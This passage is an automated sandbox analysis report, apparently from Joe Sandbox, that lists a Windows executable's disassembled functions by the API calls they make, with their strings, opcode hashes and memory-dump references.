                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008816CB,00000000,?,?,00881AE2,?,?), ref: 008BBF27
                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008816CB,00000000,?,?,00881AE2,?,?), ref: 008BBF3E
                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008816CB,00000000,?,?,00881AE2,?,?), ref: 008BBF5A
                              • DeleteObject.GDI32(00000000), ref: 008BBF6C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                              • String ID:
                              • API String ID: 641708696-0
                              • Opcode ID: ebb8eb21e49b91ed8ee153acc009e86a0d468aad2e1ab493e84aee89560febb6
                              • Instruction ID: afe006d647895f69efd38dffc80e90cfd8e355a48d2473512912d1e836efb073
                              • Opcode Fuzzy Hash: ebb8eb21e49b91ed8ee153acc009e86a0d468aad2e1ab493e84aee89560febb6
                              • Instruction Fuzzy Hash: 55619B79128B14DFDB35AF18DD48B69B7F1FF42316F108528E042D6A60CB71A981EF92
                              APIs
                                • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                              • GetSysColor.USER32(0000000F), ref: 008821D3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ColorLongWindow
                              • String ID:
                              • API String ID: 259745315-0
                              • Opcode ID: 78430658e1f4c454d4523bd7375796420b9cb53753c3c1275dee34c6d6abf88d
                              • Instruction ID: b910125abee0866ad204e89d0556c007ccc30b87d03f0e6d57bf45d4d02fa650
                              • Opcode Fuzzy Hash: 78430658e1f4c454d4523bd7375796420b9cb53753c3c1275dee34c6d6abf88d
                              • Instruction Fuzzy Hash: 1C41B231108144AFDB21AF28DC98BB97B66FB46335F144365FD65CA2E2C7318D42EB61
                              APIs
                              • CharLowerBuffW.USER32(?,?,0090F910), ref: 008EAB76
                              • GetDriveTypeW.KERNEL32(00000061,0093A620,00000061), ref: 008EAC40
                              • _wcscpy.LIBCMT ref: 008EAC6A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: BuffCharDriveLowerType_wcscpy
                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                              • API String ID: 2820617543-1000479233
                              • Opcode ID: a6ee15f86e2e931e5f907f080d7a2fe7c2280932969c786e03b0a865bc569088
                              • Instruction ID: ca58795ec24828b2e7531f94f184ae821c7ea1d2079451991dd517526fbb0028
                              • Opcode Fuzzy Hash: a6ee15f86e2e931e5f907f080d7a2fe7c2280932969c786e03b0a865bc569088
                              • Instruction Fuzzy Hash: 6251AD311083459BC728EF19C891AAEB7A5FF86B14F144829F4D6D72A2DB31E909CB53
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __i64tow__itow__swprintf
                              • String ID: %.15g$0x%p$False$True
                              • API String ID: 421087845-2263619337
                              • Opcode ID: 0b1f26737761a7a24e06e1fd79a43c959917ada22c33cd0705670952a0b75e08
                              • Instruction ID: 364bae6a8260198223cf2037e73169e57b9298dd2f97ca335ccc36825ae9f356
                              • Opcode Fuzzy Hash: 0b1f26737761a7a24e06e1fd79a43c959917ada22c33cd0705670952a0b75e08
                              • Instruction Fuzzy Hash: 9141B671604209AFEB24AB38DC41F7A7BE8FB45314F24446EF689D6292EE7199418B12
                              APIs
                              • _memset.LIBCMT ref: 009073D9
                              • CreateMenu.USER32 ref: 009073F4
                              • SetMenu.USER32(?,00000000), ref: 00907403
                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00907490
                              • IsMenu.USER32(?), ref: 009074A6
                              • CreatePopupMenu.USER32 ref: 009074B0
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009074DD
                              • DrawMenuBar.USER32 ref: 009074E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                              • String ID: 0$F
                              • API String ID: 176399719-3044882817
                              • Opcode ID: 58e11f7a2ba224f063b762eb858d39898512b3c817d4966dc7caa4d6032d056b
                              • Instruction ID: cfab1ea6a24bf858680d32d107ef5a021679360bd78a511c537f44a31b234bb4
                              • Opcode Fuzzy Hash: 58e11f7a2ba224f063b762eb858d39898512b3c817d4966dc7caa4d6032d056b
                              • Instruction Fuzzy Hash: 3C415978A04205EFDB20DFA8D884EAABBFAFF49310F144429F955973A0D730A920DF50
                              APIs
                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 009077CD
                              • CreateCompatibleDC.GDI32(00000000), ref: 009077D4
                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 009077E7
                              • SelectObject.GDI32(00000000,00000000), ref: 009077EF
                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 009077FA
                              • DeleteDC.GDI32(00000000), ref: 00907803
                              • GetWindowLongW.USER32(?,000000EC), ref: 0090780D
                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00907821
                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0090782D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                              • String ID: static
                              • API String ID: 2559357485-2160076837
                              • Opcode ID: 726dd2a80391d52166636e0e8967f6241e9ba0c8cfad48ac3f7eb949319a6e5d
                              • Instruction ID: 6e33beed37e3f6c9fc2b0e851fefebfc418101e15bcd436a89a76c6c6284c1b1
                              • Opcode Fuzzy Hash: 726dd2a80391d52166636e0e8967f6241e9ba0c8cfad48ac3f7eb949319a6e5d
                              • Instruction Fuzzy Hash: 9D318E32518215AFDF219FA4DC58FDA3B6DFF09364F104224FA15A60E0C731E921EBA4
                              APIs
                              • _memset.LIBCMT ref: 008A707B
                                • Part of subcall function 008A8D68: __getptd_noexit.LIBCMT ref: 008A8D68
                              • __gmtime64_s.LIBCMT ref: 008A7114
                              • __gmtime64_s.LIBCMT ref: 008A714A
                              • __gmtime64_s.LIBCMT ref: 008A7167
                              • __allrem.LIBCMT ref: 008A71BD
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A71D9
                              • __allrem.LIBCMT ref: 008A71F0
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A720E
                              • __allrem.LIBCMT ref: 008A7225
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A7243
                              • __invoke_watson.LIBCMT ref: 008A72B4
                              Similarity
                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                              • String ID:
                              • API String ID: 384356119-0
                              • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                              • Instruction ID: f471124ecaf99171a2550d2bda1bdce1e35846dafc02eb41860f655ebfdb28f9
                              • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                              • Instruction Fuzzy Hash: F071C771A04B16ABF7149E7DCC42BAAB3A8FF12324F14423AF515E7B81E770E9409791
                              APIs
                              • _memset.LIBCMT ref: 008E2A31
                              • GetMenuItemInfoW.USER32(00946890,000000FF,00000000,00000030), ref: 008E2A92
                              • SetMenuItemInfoW.USER32(00946890,00000004,00000000,00000030), ref: 008E2AC8
                              • Sleep.KERNEL32(000001F4), ref: 008E2ADA
                              • GetMenuItemCount.USER32(?), ref: 008E2B1E
                              • GetMenuItemID.USER32(?,00000000), ref: 008E2B3A
                              • GetMenuItemID.USER32(?,-00000001), ref: 008E2B64
                              • GetMenuItemID.USER32(?,?), ref: 008E2BA9
                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008E2BEF
                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E2C03
                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E2C24
                              Similarity
                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                              • String ID:
                              • API String ID: 4176008265-0
                              • Opcode ID: 4ad48f32ac953670daaeaf602863db4332d88108d4ba705727a636d73e2c6be0
                              • Instruction ID: d5112a5ee3ea39cd1cd44699589949e5ecf925adbe846af733b3072632623b9b
                              • Opcode Fuzzy Hash: 4ad48f32ac953670daaeaf602863db4332d88108d4ba705727a636d73e2c6be0
                              • Instruction Fuzzy Hash: DA617BB0914289AFDB21CF65CC88EAE7BBCFB42314F140569E841E3251D771AE45EB21
                              APIs
                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00907214
                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00907217
                              • GetWindowLongW.USER32(?,000000F0), ref: 0090723B
                              • _memset.LIBCMT ref: 0090724C
                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0090725E
                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009072D6
                              Similarity
                              • API ID: MessageSend$LongWindow_memset
                              • String ID:
                              • API String ID: 830647256-0
                              • Opcode ID: 3d7dfe658f40754c27da95923f327ce658d8723feaa815cadb94f4e05d53cf6b
                              • Instruction ID: e6b6130be04ddebd3909d8a120709c0ecb6c212a5acd6819652d23f7c0782652
                              • Opcode Fuzzy Hash: 3d7dfe658f40754c27da95923f327ce658d8723feaa815cadb94f4e05d53cf6b
                              • Instruction Fuzzy Hash: F5616BB5904208AFDB20DFA4CC81EEEB7F8EB09710F140159FA14E72E1D774A945DB60
                              APIs
                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 008D7135
                              • SafeArrayAllocData.OLEAUT32(?), ref: 008D718E
                              • VariantInit.OLEAUT32(?), ref: 008D71A0
                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 008D71C0
                              • VariantCopy.OLEAUT32(?,?), ref: 008D7213
                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 008D7227
                              • VariantClear.OLEAUT32(?), ref: 008D723C
                              • SafeArrayDestroyData.OLEAUT32(?), ref: 008D7249
                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008D7252
                              • VariantClear.OLEAUT32(?), ref: 008D7264
                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 008D726F
                              Similarity
                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                              • String ID:
                              • API String ID: 2706829360-0
                              • Opcode ID: 4783f0394abaace50dc6045631a93b97ef5c4f87007e5668d89877617cd2e545
                              • Instruction ID: d87fa5867b27f14c88e9e6debffdb103b8eb5a2f20a644a9b034fdb87cfb9457
                              • Opcode Fuzzy Hash: 4783f0394abaace50dc6045631a93b97ef5c4f87007e5668d89877617cd2e545
                              • Instruction Fuzzy Hash: 234163319042199FCF10DFA8D898DAEBBB9FF08354F008166F956E7361DB30AA45CB91
                              APIs
                              • WSAStartup.WSOCK32(00000101,?), ref: 008F5AA6
                              • inet_addr.WSOCK32(?,?,?), ref: 008F5AEB
                              • gethostbyname.WSOCK32(?), ref: 008F5AF7
                              • IcmpCreateFile.IPHLPAPI ref: 008F5B05
                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008F5B75
                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 008F5B8B
                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008F5C00
                              • WSACleanup.WSOCK32 ref: 008F5C06
                              Strings
                              Similarity
                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                              • String ID: Ping
                              • API String ID: 1028309954-2246546115
                              • Opcode ID: 27f5596034f04ffa59f76a4ff6227f7e3a310a7b7863234f147da13a140fd527
                              • Instruction ID: 5dc7f4b63e8272bf8c0498806164b4b5ae6d3f04d8588239c6f1d93d4b0ed838
                              • Opcode Fuzzy Hash: 27f5596034f04ffa59f76a4ff6227f7e3a310a7b7863234f147da13a140fd527
                              • Instruction Fuzzy Hash: FE518F316047049FD720AF24CC59B3AB7E4FF48720F148929F696DB2A1DB70E9009B42
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 008EB73B
                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 008EB7B1
                              • GetLastError.KERNEL32 ref: 008EB7BB
                              • SetErrorMode.KERNEL32(00000000,READY), ref: 008EB828
                              Strings
                              Similarity
                              • API ID: Error$Mode$DiskFreeLastSpace
                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                              • API String ID: 4194297153-14809454
                              • Opcode ID: e90d2443b92a378511de3deeb49d3fbac9fe58e8ad6374ac882a3b56b2088223
                              • Instruction ID: 00a4c44529710d16c2b558d98fad583b4c5e3409b28803a022c671fb396f90fb
                              • Opcode Fuzzy Hash: e90d2443b92a378511de3deeb49d3fbac9fe58e8ad6374ac882a3b56b2088223
                              • Instruction Fuzzy Hash: 8931C435A00248AFDB10EF69CC85ABF7BB4FF8A754F144029E541D7291DB719E42CB51
                              APIs
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 008D94F6
                              • GetDlgCtrlID.USER32 ref: 008D9501
                              • GetParent.USER32 ref: 008D951D
                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 008D9520
                              • GetDlgCtrlID.USER32(?), ref: 008D9529
                              • GetParent.USER32(?), ref: 008D9545
                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 008D9548
                              Strings
                              Similarity
                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                              • String ID: ComboBox$ListBox
                              • API String ID: 1536045017-1403004172
                              • Opcode ID: 354f3dac1f7856199be001807c4fb29d1f89028286d7ea137cf41fd1f940836b
                              • Instruction ID: 6a5a75792bf2588004e7708a4034939a358a191508e9667f41ee096aa312bac7
                              • Opcode Fuzzy Hash: 354f3dac1f7856199be001807c4fb29d1f89028286d7ea137cf41fd1f940836b
                              • Instruction Fuzzy Hash: 5321B075904208AFCF05AF64CC95EFEBBB5FF49310F10022AF961972A2DB7599199B20
                              APIs
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008D95DF
                              • GetDlgCtrlID.USER32 ref: 008D95EA
                              • GetParent.USER32 ref: 008D9606
                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 008D9609
                              • GetDlgCtrlID.USER32(?), ref: 008D9612
                              • GetParent.USER32(?), ref: 008D962E
                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 008D9631
                              Strings
                              Similarity
                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                              • String ID: ComboBox$ListBox
                              • API String ID: 1536045017-1403004172
                              • Opcode ID: 8e7fc4a2d3faf69a3611a6efc6c624c60f99676486dbabadc0868b35c9b00819
                              • Instruction ID: afdf39119a09edbed9e2562d2a1b325d52e587bdb5b364c5e797ad55fc36fccb
                              • Opcode Fuzzy Hash: 8e7fc4a2d3faf69a3611a6efc6c624c60f99676486dbabadc0868b35c9b00819
                              • Instruction Fuzzy Hash: 1721A175900208BFDF15AB64CC95EFEBBB8FF58300F100216F951D72A1DB7599199B21
                              APIs
                              • GetParent.USER32 ref: 008D9651
                              • GetClassNameW.USER32(00000000,?,00000100), ref: 008D9666
                              • _wcscmp.LIBCMT ref: 008D9678
                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008D96F3
                              Strings
                              Similarity
                              • API ID: ClassMessageNameParentSend_wcscmp
                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                              • API String ID: 1704125052-3381328864
                              • Opcode ID: ff10ad032c1395c886152eb5fda9a918f69e6ef9fbf7ea0293021966480ffae1
                              • Instruction ID: c65918f3e0a9594de0809639e78f1b3661dcbf9adfeec127ed049cff0da6e6fa
                              • Opcode Fuzzy Hash: ff10ad032c1395c886152eb5fda9a918f69e6ef9fbf7ea0293021966480ffae1
                              • Instruction Fuzzy Hash: 2C113A37248307BAFA112624EC06DA6779CEB11328F200227FD00E15D1FE92E9415A49
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 008F8BEC
                              • CoInitialize.OLE32(00000000), ref: 008F8C19
                              • CoUninitialize.OLE32 ref: 008F8C23
                              • GetRunningObjectTable.OLE32(00000000,?), ref: 008F8D23
                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 008F8E50
                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00912C0C), ref: 008F8E84
                              • CoGetObject.OLE32(?,00000000,00912C0C,?), ref: 008F8EA7
                              • SetErrorMode.KERNEL32(00000000), ref: 008F8EBA
                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 008F8F3A
                              • VariantClear.OLEAUT32(?), ref: 008F8F4A
                              Similarity
                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                              • String ID:
                              • API String ID: 2395222682-0
                              • Opcode ID: 7c264092cb3539c2eabcb818ebd36a09a3503888d31ed707022118fc251447cc
                              • Instruction ID: b3d0c2cae04e20e4fbef0a617bf453e1b1a94d699624383e03120f0be2a84e6e
                              • Opcode Fuzzy Hash: 7c264092cb3539c2eabcb818ebd36a09a3503888d31ed707022118fc251447cc
                              • Instruction Fuzzy Hash: 75C1E071208309AFD700EF68C88496AB7E9FF89748F04495DFA8ADB251DB71ED05CB52
                              APIs
                              • __swprintf.LIBCMT ref: 008E419D
                              • __swprintf.LIBCMT ref: 008E41AA
                                • Part of subcall function 008A38D8: __woutput_l.LIBCMT ref: 008A3931
                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 008E41D4
                              • LoadResource.KERNEL32(?,00000000), ref: 008E41E0
                              • LockResource.KERNEL32(00000000), ref: 008E41ED
                              • FindResourceW.KERNEL32(?,?,00000003), ref: 008E420D
                              • LoadResource.KERNEL32(?,00000000), ref: 008E421F
                              • SizeofResource.KERNEL32(?,00000000), ref: 008E422E
                              • LockResource.KERNEL32(?), ref: 008E423A
                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 008E429B
                              Similarity
                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                              • String ID:
                              • API String ID: 1433390588-0
                              • Opcode ID: b827bf46754e880cc0f87fd10026416a0c81cabe13d337f45baff60c98296ba3
                              • Instruction ID: 45a0c5cea0a4917b7c5aced80bf63654cc5ec8f479f4965402c35acce244c1d6
                              • Opcode Fuzzy Hash: b827bf46754e880cc0f87fd10026416a0c81cabe13d337f45baff60c98296ba3
                              • Instruction Fuzzy Hash: 2C31EF71A0924AAFDB109FA1DC58EBF7BACFF0A301F004425FA19D6550E730DA11EBA0
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 008E1700
                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,008E0778,?,00000001), ref: 008E1714
                              • GetWindowThreadProcessId.USER32(00000000), ref: 008E171B
                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008E0778,?,00000001), ref: 008E172A
                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 008E173C
                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008E0778,?,00000001), ref: 008E1755
                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008E0778,?,00000001), ref: 008E1767
                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,008E0778,?,00000001), ref: 008E17AC
                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,008E0778,?,00000001), ref: 008E17C1
                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,008E0778,?,00000001), ref: 008E17CC
                              Similarity
                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                              • String ID:
                              • API String ID: 2156557900-0
                              • Opcode ID: 51b3be7d0210f0a9288b65bba2ef7e7d46fa0a8040ec58abdcf23a8a7bb613ef
                              • Instruction ID: 426421599284a130d2acc78f2d87875ed43f7c7016fa45876e0ce0be6d3e9c67
                              • Opcode Fuzzy Hash: 51b3be7d0210f0a9288b65bba2ef7e7d46fa0a8040ec58abdcf23a8a7bb613ef
                              • Instruction Fuzzy Hash: 4431BF79628248BFEF21DF55DC88F69BBA9FB1BB55F104064F800C62A0DB709E449B60
                              APIs
                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0088FC06
                              • OleUninitialize.OLE32(?,00000000), ref: 0088FCA5
                              • UnregisterHotKey.USER32(?), ref: 0088FDFC
                              • DestroyWindow.USER32(?), ref: 008C4A00
                              • FreeLibrary.KERNEL32(?), ref: 008C4A65
                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 008C4A92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                              • String ID: close all
                              • API String ID: 469580280-3243417748
                              • Opcode ID: 7ae07fc9281ef2917cd41d61c01720cc9bb9ee1ed5c4e9338acf661a7c5bf4fe
                              • Instruction ID: 32b644ddaacb9cfa1e14bcab72d02280ae8663c8f7d16ed2e5cfb75665fc9110
                              • Opcode Fuzzy Hash: 7ae07fc9281ef2917cd41d61c01720cc9bb9ee1ed5c4e9338acf661a7c5bf4fe
                              • Instruction Fuzzy Hash: 21A136347012228FCB28EB58C4A5F69B7A4FF05710F1452ADE90AEB262DB30ED56CF55
                              APIs
                              • EnumChildWindows.USER32(?,008DAA64), ref: 008DA9A2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ChildEnumWindows
                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                              • API String ID: 3555792229-1603158881
                              • Opcode ID: 85c4ef4f9c1ab88677f026c8512d7515fc1063ecc0c51742d67e3d6fc09e5a5c
                              • Instruction ID: 4e2dc925223ff7dd897ef04362fd6a0816411f6cc4c8ade22bb07fda97d70933
                              • Opcode Fuzzy Hash: 85c4ef4f9c1ab88677f026c8512d7515fc1063ecc0c51742d67e3d6fc09e5a5c
                              • Instruction Fuzzy Hash: 2F91A47150060AEADB1CDF64C491BE9FB75FF04304F608226E899E7741DF30AA59CB92
                              APIs
                              • SetWindowLongW.USER32(?,000000EB), ref: 00882EAE
                                • Part of subcall function 00881DB3: GetClientRect.USER32(?,?), ref: 00881DDC
                                • Part of subcall function 00881DB3: GetWindowRect.USER32(?,?), ref: 00881E1D
                                • Part of subcall function 00881DB3: ScreenToClient.USER32(?,?), ref: 00881E45
                              • GetDC.USER32 ref: 008BCF82
                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 008BCF95
                              • SelectObject.GDI32(00000000,00000000), ref: 008BCFA3
                              • SelectObject.GDI32(00000000,00000000), ref: 008BCFB8
                              • ReleaseDC.USER32(?,00000000), ref: 008BCFC0
                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008BD04B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                               • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
